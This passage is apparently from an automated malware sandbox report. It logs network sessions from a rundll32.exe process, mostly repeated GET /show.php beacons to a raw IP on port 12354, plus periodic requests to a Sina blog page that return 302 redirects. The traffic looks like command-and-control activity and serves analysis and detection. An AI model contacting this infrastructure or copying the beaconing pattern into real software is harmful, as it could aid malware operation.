                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              60192.168.2.450223107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:22.933326960 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              61192.168.2.450226107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:23.269782066 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              62192.168.2.450240107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:24.666181087 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              63192.168.2.450243107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:24.777081013 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              64192.168.2.450244202.108.0.52806644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:24.780812979 CET214OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:25:26.400546074 CET371INHTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:25:26 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              65192.168.2.450267107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:26.951982021 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              66192.168.2.450270107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:27.070265055 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              67192.168.2.450295107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:28.678448915 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              68192.168.2.450298107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:28.835324049 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              69192.168.2.450299202.108.0.52806644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:28.835434914 CET214OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:25:30.353166103 CET371INHTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:25:30 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              70192.168.2.450321107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:30.939234972 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              71192.168.2.450324107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:31.083494902 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              72192.168.2.450356107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:32.681602955 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              73192.168.2.450358202.108.0.52806644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:32.809689999 CET214OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:25:34.356770992 CET371INHTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:25:34 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              74192.168.2.450359107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:32.810214996 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              75192.168.2.450389107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:34.933986902 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              76192.168.2.450392107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:35.039336920 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              77192.168.2.450423107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:36.705670118 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              78192.168.2.450429107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:36.823462963 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              79192.168.2.450430202.108.0.52806644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:36.823565960 CET214OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:25:38.405175924 CET371INHTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:25:38 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              80192.168.2.450467107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:38.943375111 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              81192.168.2.450470107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:39.066222906 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              82192.168.2.450500107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:40.767870903 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              83192.168.2.450502107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:40.902616978 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              84192.168.2.450503202.108.0.52806644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:40.902745008 CET214OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:25:42.474132061 CET371INHTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:25:42 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              85192.168.2.450557107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:43.003683090 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              86192.168.2.450563107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:43.160845041 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              87192.168.2.450618107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:44.900798082 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              88192.168.2.450622107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:45.010304928 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              89192.168.2.450623202.108.0.52806644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:45.014164925 CET214OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:25:46.594037056 CET371INHTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:25:46 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              90192.168.2.450687107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:47.158174038 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              91192.168.2.450692107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:47.272820950 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              92192.168.2.450748107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:48.896734953 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              93192.168.2.450753107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:49.012020111 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              94192.168.2.450754202.108.0.52806644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:49.012139082 CET214OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:25:50.583398104 CET371INHTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:25:50 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              95192.168.2.450835107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:51.253005028 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              96192.168.2.450837107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:51.424747944 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              97192.168.2.450912107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:52.897680998 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              98192.168.2.450919107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:53.009042978 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              99192.168.2.450921202.108.0.52806644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:53.015444040 CET214OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
